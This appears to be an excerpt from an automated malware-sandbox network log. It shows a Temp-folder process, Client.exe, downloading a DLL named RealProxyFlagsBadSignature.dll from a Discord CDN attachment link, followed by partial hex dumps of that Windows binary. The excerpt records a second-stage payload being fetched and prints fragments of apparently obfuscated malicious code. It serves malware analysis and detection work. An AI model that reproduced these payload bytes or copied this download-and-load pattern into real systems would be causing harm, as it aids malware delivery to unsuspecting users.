                                                                                        2022-08-08 15:18:38 UTC119INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff
                                                                                        Data Ascii: ( @BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                        2022-08-08 15:18:38 UTC121INData Raw: 77 77 77 77 77 77 77 77 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 ff ff ff ff ff ff ff ff ff ff ff ff 77 ff ff 77 77 77 77
                                                                                        Data Ascii: wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
                                                                                        2022-08-08 15:18:38 UTC122INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii:
                                                                                        2022-08-08 15:18:38 UTC126INData Raw: 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42 ff 42 42 42
                                                                                        Data Ascii: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        4192.168.2.2249179162.159.135.233443C:\Users\user\AppData\Local\Temp\Client.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-08-08 15:18:44 UTC128OUTGET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1
                                                                                        Host: cdn.discordapp.com
                                                                                        Connection: Keep-Alive
                                                                                        2022-08-08 15:18:44 UTC128INHTTP/1.1 200 OK
                                                                                        Date: Mon, 08 Aug 2022 15:18:44 GMT
                                                                                        Content-Type: application/x-msdos-program
                                                                                        Content-Length: 59904
                                                                                        Connection: close
                                                                                        CF-Ray: 737939f09a07920e-FRA
                                                                                        Accept-Ranges: bytes
                                                                                        Age: 110068
                                                                                        Cache-Control: public, max-age=31536000
                                                                                        Content-Disposition: attachment;%20filename=RealProxyFlagsBadSignature.dll, attachment
                                                                                        ETag: "79242a4038e35f2234d3373fb9133c3b"
                                                                                        Expires: Tue, 08 Aug 2023 15:18:44 GMT
                                                                                        Last-Modified: Sun, 07 Aug 2022 05:12:50 GMT
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: HIT
                                                                                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                        x-goog-generation: 1659849170365462
                                                                                        x-goog-hash: crc32c=NYw5/Q==
                                                                                        x-goog-hash: md5=eSQqQDjjXyI00zc/uRM8Ow==
                                                                                        x-goog-metageneration: 1
                                                                                        x-goog-storage-class: STANDARD
                                                                                        x-goog-stored-content-encoding: identity
                                                                                        x-goog-stored-content-length: 59904
                                                                                        X-GUploader-UploadID: ADPycdtP7hWq-m1jw8hHiFuOhUUGho9dt9Hc1qvNxT5FOCA5MXvLa9LZANvOMilQY3YAhxHuFU6Q0W62LHCD3mqDogx_bZPYVQw-
                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                        2022-08-08 15:18:44 UTC130INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 45 51 75 62 4f 48 6e 4f 4c 77 73 61 55 46 69 70 6b 74 53 25 32 42 32 6b 79 25 32 42 48 76 37 72 5a 33 6d 25 32 42 33 50 41 6e 79 54 34 6c 78 7a 4f 58 55 71 55 43 58 6a 50 61 68 30 56 73 35 57 45 6b 48 30 43 35 33 61 25 32 42 4d 64 4a 4e 34 61 25 32 46 51 58 68 30 76 5a 37 54 4a 59 41 73 55 73 67 55 7a 31 77 7a 25 32 46 44 6e 4d 5a 70 53 69 5a 61 52 6c 37 4b 66 58 6b 71 71 50 25 32 42 55 56 33 6e 48 63 38 68 73 25 32 46 59 38 48 78 36 77 35 59 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c
                                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EQubOHnOLwsaUFipktS%2B2ky%2BHv7rZ3m%2B3PAnyT4lxzOXUqUCXjPah0Vs5WEkH0C53a%2BMdJN4a%2FQXh0vZ7TJYAsUsgUz1wz%2FDnMZpSiZaRl7KfXkqqP%2BUV3nHc8hs%2FY8Hx6w5Yg%3D%3D"}],"group":"cf-nel",
                                                                                        2022-08-08 15:18:44 UTC130INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c2 48 ef 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 b8 00 00 00 30 00 00 00 00 00 00 8e d6 00 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELHb!0 @ @`
                                                                                        2022-08-08 15:18:44 UTC131INData Raw: 38 f8 01 00 00 38 f3 01 00 00 20 15 00 00 00 fe 0c 00 00 3f fc 00 00 00 20 15 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 74 08 00 00 20 11 00 00 00 fe 0c 00 00 3f 64 00 00 00 20 11 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 19 07 00 00 20 0f 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 34 06 00 00 38 8b 01 00 00 20 10 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 10 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 93 06 00 00 38 65 01 00 00 38 60 01 00 00 20 13 00 00 00 fe 0c 00 00 3f 3e 00 00 00 20 13 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 35 07 00 00 20 12 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 12 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 cd 06 00 00 38 19 01 00 00 38 14 01 00 00 20 14 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 14 00 00 00 fe 0c 00
                                                                                        Data Ascii: 88 ? =8t ?d =8 ? =848 ? =88e8` ?> =85 ? =888 ?
                                                                                        2022-08-08 15:18:44 UTC133INData Raw: 04 00 fe 0c 03 00 20 01 00 00 00 59 20 01 00 00 00 9c fe 0c 08 00 fe 0c 03 00 20 01 00 00 00 59 8f 05 00 00 01 e0 fe 0c 06 00 fe 0c 03 00 20 01 00 00 00 59 9a fe 0c 08 00 fe 0c 03 00 20 01 00 00 00 59 8f 05 00 00 01 e0 4a fe 0c 01 00 7e 03 00 00 04 fe 0c 0b 00 fe 0c 03 00 20 01 00 00 00 59 94 97 29 05 00 00 11 7e 03 00 00 04 fe 0c 0c 00 fe 0c 02 00 58 4a 97 29 06 00 00 11 55 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 c3 f7 ff ff fe 0c 08 00 fe 0c 03 00 20 02 00 00 00 59 8f 05 00 00 01 e0 4c fe 0c 08 00 fe 0c 03 00 20 01 00 00 00 59 8f 05 00 00 01 e0 4c fe 02 fe 0c 0c 00 fe 0c 02 00 58 4a fe 0c 0c 00 20 08 00 00 00 58 fe 0c 02 00 58 4a 59 5a fe 0c 0c 00 20 08 00 00 00 58 fe 0c 02 00 58 4a 58 fe 0c 0f 00 58 fe 0e 0c 00 fe 0c 03 00 20 02 00 00 00 59 fe 0e
                                                                                        Data Ascii: Y Y Y YJ~ Y)~XJ)U X8 YL YLXJ XXJYZ XXJXX Y
                                                                                        2022-08-08 15:18:44 UTC134INData Raw: 06 03 00 00 06 9b 7e 03 00 00 04 20 02 00 00 00 fe 06 04 00 00 06 9b 7e 03 00 00 04 20 03 00 00 00 fe 06 05 00 00 06 9b 7e 03 00 00 04 20 04 00 00 00 fe 06 06 00 00 06 9b 7e 03 00 00 04 20 05 00 00 00 fe 06 07 00 00 06 9b 7e 03 00 00 04 20 06 00 00 00 fe 06 08 00 00 06 9b 7e 03 00 00 04 20 07 00 00 00 fe 06 09 00 00 06 9b 2a 26 02 28 08 00 00 0a 00 00 2a 2a 00 02 28 0c 00 00 0a 00 00 2a aa 73 0e 00 00 0a 80 04 00 00 04 73 0f 00 00 0a 80 05 00 00 04 73 10 00 00 0a 80 06 00 00 04 73 11 00 00 0a 80 07 00 00 04 00 2a 13 30 01 00 10 00 00 00 0a 00 00 11 00 7e 04 00 00 04 6f 12 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 0b 00 00 11 00 7e 05 00 00 04 6f 13 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 0c 00 00 11 00 7e 06 00 00 04 6f 14 00 00 0a 0a 2b 00
                                                                                        Data Ascii: ~ ~ ~ ~ ~ ~ *&(**(*ssss*0~o+*0~o+*0~o+
                                                                                        2022-08-08 15:18:44 UTC135INData Raw: 2b 0d 07 6f 3a 00 00 0a 6f 3b 00 00 0a 13 04 09 14 fe 01 16 fe 01 13 10 11 10 39 25 01 00 00 02 2c 03 03 2d 03 16 2b 01 17 00 13 11 11 11 2c 58 02 8e b7 17 da 13 05 16 11 05 13 0e 13 08 2b 3e 02 11 08 9a 13 07 03 11 08 9a 13 06 11 04 11 07 6f 3c 00 00 0a 13 11 11 11 2c 1b 09 11 06 28 3d 00 00 0a 13 10 11 10 2c 07 07 6f 3e 00 00 0a 00 00 14 0b 00 2b 12 00 00 11 08 17 d6 13 08 11 08 11 0e 13 12 11 12 31 b8 00 07 14 fe 01 16 fe 01 13 11 11 11 39 aa 00 00 00 04 14 fe 01 16 fe 01 13 10 11 10 2c 7f 04 6f 3f 00 00 0a 17 da 13 09 16 11 09 13 0f 13 0d 2b 62 04 11 0d 6f 40 00 00 0a 13 0a 11 0a 6f 3a 00 00 0a 6f 3b 00 00 0a 13 0c 11 0a 6f 06 00 00 2b 13 0b 11 0b 14 fe 01 16 fe 01 13 11 11 11 2c 2b 11 04 11 0c 6f 3c 00 00 0a 13 10 11 10 2c 1b 09 11 0b 28 3d 00 00 0a
                                                                                        Data Ascii: +o:o;9%,-+,X+>o<,(=,o>+19,o?+bo@o:o;o+,+o<,(=
                                                                                        2022-08-08 15:18:44 UTC137INData Raw: 11 2f 28 31 00 00 06 13 04 18 8d 08 00 00 01 13 2f 11 2f 16 72 1a 08 00 70 a2 00 11 2f 17 72 15 0a 00 70 a2 00 11 2f 28 31 00 00 06 13 14 18 8d 08 00 00 01 13 2f 11 2f 16 72 ba 0a 00 70 a2 00 11 2f 17 72 61 0d 00 70 a2 00 11 2f 28 31 00 00 06 13 08 18 8d 08 00 00 01 13 2f 11 2f 16 72 06 0e 00 70 a2 00 11 2f 17 72 53 11 00 70 a2 00 11 2f 28 31 00 00 06 13 0a 18 8d 08 00 00 01 13 2f 11 2f 16 72 f8 11 00 70 a2 00 11 2f 17 72 a3 14 00 70 a2 00 11 2f 28 31 00 00 06 13 0b 18 8d 08 00 00 01 13 2f 11 2f 16 72 48 15 00 70 a2 00 11 2f 17 72 9f 18 00 70 a2 00 11 2f 28 31 00 00 06 13 0c 18 8d 08 00 00 01 13 2f 11 2f 16 72 44 19 00 70 a2 00 11 2f 17 72 9b 1c 00 70 a2 00 11 2f 28 31 00 00 06 13 0d 18 8d 08 00 00 01 13 2f 11 2f 16 72 40 1d 00 70 a2 00 11 2f 17 72 ed 1f
                                                                                        Data Ascii: /(1//rp/rp/(1//rp/rap/(1//rp/rSp/(1//rp/rp/(1//rHp/rp/(1//rDp/rp/(1//r@p/r
                                                                                        2022-08-08 15:18:44 UTC138INData Raw: 13 32 11 32 2c 06 73 5e 00 00 0a 7a 00 11 06 12 01 7b 10 00 00 04 6f 5e 00 00 06 15 fe 01 13 32 11 32 2c 06 73 5e 00 00 0a 7a 00 de 40 25 28 61 00 00 0a 13 2d 00 12 01 7b 11 00 00 04 84 28 62 00 00 0a 13 2e 11 2e 14 fe 01 16 fe 01 13 32 11 32 2c 08 11 2e 6f 63 00 00 0a 00 00 16 13 07 28 64 00 00 0a de 0d 28 64 00 00 0a de 00 00 17 13 07 2b 00 11 07 2a 41 1c 00 00 00 00 00 00 5e 02 00 00 45 03 00 00 a3 05 00 00 40 00 00 00 09 00 00 01 13 30 03 00 25 00 00 00 23 00 00 11 00 02 28 13 00 00 2b 0c 02 28 14 00 00 2b 0a 08 06 7e 67 00 00 0a 6f 68 00 00 0a 28 69 00 00 0a 0b 2b 00 07 2a 00 00 00 13 30 04 00 11 00 00 00 0e 00 00 11 00 02 03 04 17 28 30 00 00 06 26 17 0a 2b 00 06 2a 00 00 00 13 30 02 00 3b 00 00 00 24 00 00 11 00 7e 1c 00 00 04 14 28 6a 00 00 0a 0c
                                                                                        Data Ascii: 22,s^z{o^22,s^z@%(a-{(b..22,.oc(d(d+*A^E@0%#(+(+~goh(i+*0(0&+*0;$~(j
                                                                                        2022-08-08 15:18:44 UTC139INData Raw: 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0a 0a 00 00 00 01 23 e0 a6 83 83 a6 e0 23 01 23 e0 a6 e1 e1 a6 e0 23 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0b 0b 00 00 00 01 44 f4 63 61 61 63 f4 44 01 44 f4 63 0d 0d 63 f4 44 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0c 0c 00 00 00 01 3b 76 fc f1 f1 fc 76 3b 01 3b 76 fc 88 88 fc 76 3b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0d 0d 00 00 00 01 7e 32 10 97 97 10 32 7e 01 7e 32 10 b7 b7 10 32 7e 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0e 0e 00 00 00 01 62 ab d2 14 14 d2 ab 62 01 62 ab d2 63 63 d2 ab 62 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00
                                                                                        Data Ascii: ####DcaacDDccD;vv;;vv;~22~~22~bbbccb
                                                                                        2022-08-08 15:18:44 UTC141INData Raw: 26 00 00 00 01 72 76 bb 70 70 bb 76 72 01 72 76 bb 02 02 bb 76 72 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 27 27 00 00 00 01 55 ac 1d 45 45 1d ac 55 01 55 ac 1d 36 36 1d ac 55 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 28 28 00 00 00 01 71 fa 59 45 45 59 fa 71 01 71 fa 59 2c 2c 59 fa 71 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 29 29 00 00 00 01 08 5f 25 11 11 25 5f 08 01 08 5f 25 7e 7e 25 5f 08 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 2a 2a 00 00 00 01 03 c6 8f d4 d4 8f c6 03 01 03 c6 8f ba ba 8f c6 03 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 2b 2b 00 00 00 01 38 ca 33 09 09 33 ca 38 01 38
                                                                                        Data Ascii: &rvppvrrvvr''UEEUU66U((qYEEYqqY,,Yq))_%%__%~~%_**++83388
                                                                                        2022-08-08 15:18:44 UTC142INData Raw: 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 43 43 00 00 00 01 53 1f 2d f2 f2 2d 1f 53 01 53 1f 2d 93 93 2d 1f 53 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 44 44 00 00 00 01 20 bf 80 05 05 80 bf 20 01 20 bf 80 7c 7c 80 bf 20 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 45 45 00 00 00 01 02 83 a0 91 91 a0 83 02 01 02 83 a0 e2 e2 a0 83 02 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 46 46 00 00 00 01 00 23 d5 db db d5 23 00 01 00 23 d5 fb fb d5 23 00 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 47 47 00 00 00 01 32 6e 0d 17 17 0d 6e 32 01 32 6e 0d 76 76 0d 6e 32 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00
                                                                                        Data Ascii: CCS--SS--SDD || EEFF####GG2nn22nvvn2
                                                                                        2022-08-08 15:18:44 UTC143INData Raw: 00 00 01 5b a6 9c 50 50 9c a6 5b 01 5b a6 9c 70 70 9c a6 5b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 60 60 00 00 00 01 05 6b 97 c3 c3 97 6b 05 01 05 6b 97 ab ab 97 6b 05 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 61 61 00 00 00 01 1f 01 62 87 87 62 01 1f 01 1f 01 62 f3 f3 62 01 1f 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 62 62 00 00 00 01 1b d6 66 06 06 66 d6 1b 01 1b d6 66 72 72 66 d6 1b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 63 63 00 00 00 01 22 2a 7a 8a 8a 7a 2a 22 01 22 2a 7a fa fa 7a 2a 22 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 64 64 00 00 00 01 3f 18 b1 96 96 b1 18 3f 01 3f 18 b1
                                                                                        Data Ascii: [PP[[pp[``kkkkaabbbbbbfffrrfcc"*zz*""*zz*"dd???
                                                                                        2022-08-08 15:18:44 UTC145INData Raw: 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7c 7c 00 00 00 01 46 24 a0 0d 0d a0 24 46 01 46 24 a0 23 23 a0 24 46 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7d 7d 00 00 00 01 14 42 91 60 60 91 42 14 01 14 42 91 08 08 91 42 14 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7e 7e 00 00 00 01 0f 29 86 71 71 86 29 0f 01 0f 29 86 05 05 86 29 0f 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7f 7f 00 00 00 01 36 ce c7 32 32 c7 ce 36 01 36 ce c7 5f 5f c7 ce 36 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 80 80 00 00 00 01 27 33 bb 08 08 bb 33 27 01 27 33 bb 64 64 bb 33 27 06 15 16 00 00 00 05 05 00 00 00 17 00 00 00 06 06 00 00 00
                                                                                        Data Ascii: ||F$$FF$##$F}}B``BBB~~)qq)))62266__6'33''3dd3'
                                                                                        2022-08-08 15:18:44 UTC146INData Raw: 01 77 3a 83 96 96 83 3a 77 01 77 3a 83 f9 f9 83 3a 77 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 15 15 00 00 00 01 07 0d b1 74 74 b1 0d 07 01 07 0d b1 00 00 b1 0d 07 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 16 16 00 00 00 01 7b 43 ce 6d 6d ce 43 7b 01 7b 43 ce 08 08 ce 43 7b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 17 17 00 00 00 01 1d aa 8e cc cc 8e aa 1d 01 1d aa 8e af af 8e aa 1d 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 18 18 00 00 00 01 18 ac 10 61 61 10 ac 18 01 18 ac 10 15 15 10 ac 18 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 19 19 00 00 00 01 4a 2f 0a 96 96 0a 2f 4a 01 4a 2f 0a f3 f3
                                                                                        Data Ascii: w::ww::wtt{CmmC{{CC{aaJ//JJ/
                                                                                        2022-08-08 15:18:44 UTC147INData Raw: 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 31 31 00 00 00 01 32 4f 28 aa aa 28 4f 32 01 32 4f 28 c7 c7 28 4f 32 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 32 32 00 00 00 01 13 6d 96 e4 e4 96 6d 13 01 13 6d 96 a0 a0 96 6d 13 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 33 33 00 00 00 01 3c ab de ba ba de ab 3c 01 3c ab de d5 d5 de ab 3c 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 34 34 00 00 00 01 45 4d 54 d6 d6 54 4d 45 01 45 4d 54 a2 a2 54 4d 45 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 35 35 00 00 00 01 25 16 9c a5 a5 9c 16 25 01 25 16 9c 85 85 9c 16 25 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01
                                                                                        Data Ascii: 112O((O22O((O222mmmm33<<<<44EMTTMEEMTTME55%%%%
                                                                                        2022-08-08 15:18:44 UTC149INData Raw: b2 63 8a 8a 63 b2 65 01 65 b2 63 ff ff 63 b2 65 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 4e 4e 00 00 00 01 4b 2b cb ea ea cb 2b 4b 01 4b 2b cb 93 93 cb 2b 4b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 4f 4f 00 00 00 01 16 9d 9a 2e 2e 9a 9d 16 01 16 9d 9a 0e 0e 9a 9d 16 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 50 50 00 00 00 01 09 a8 9b 11 11 9b a8 09 01 09 a8 9b 77 77 9b a8 09 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 51 51 00 00 00 01 26 25 c2 42 42 c2 25 26 01 26 25 c2 37 37 c2 25 26 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 52 52 00 00 00 01 63 12 23 67 67 23 12 63 01 63 12 23 0b 0b 23 12
                                                                                        Data Ascii: cceecceNNK++KK++KOO..PPwwQQ&%BB%&&%77%&RRc#gg#cc##
                                                                                        2022-08-08 15:18:44 UTC150INData Raw: 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6a 6a 00 00 00 01 09 a8 84 c6 c6 84 a8 09 01 09 a8 84 b1 b1 84 a8 09 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6b 6b 00 00 00 01 50 9e 93 66 66 93 9e 50 01 50 9e 93 48 48 93 9e 50 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6c 6c 00 00 00 01 66 0c e7 09 09 e7 0c 66 01 66 0c e7 68 68 e7 0c 66 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6d 6d 00 00 00 01 62 b3 c7 2b 2b c7 b3 62 01 62 b3 c7 59 59 c7 b3 62 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6e 6e 00 00 00 01 4c 57 57 48 48 57 57 4c 01 4c 57 57 25 25 57 57 4c 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00
                                                                                        Data Ascii: jjkkPffPPHHPllfffhhfmmb++bbYYbnnLWWHHWWLLWW%%WWL
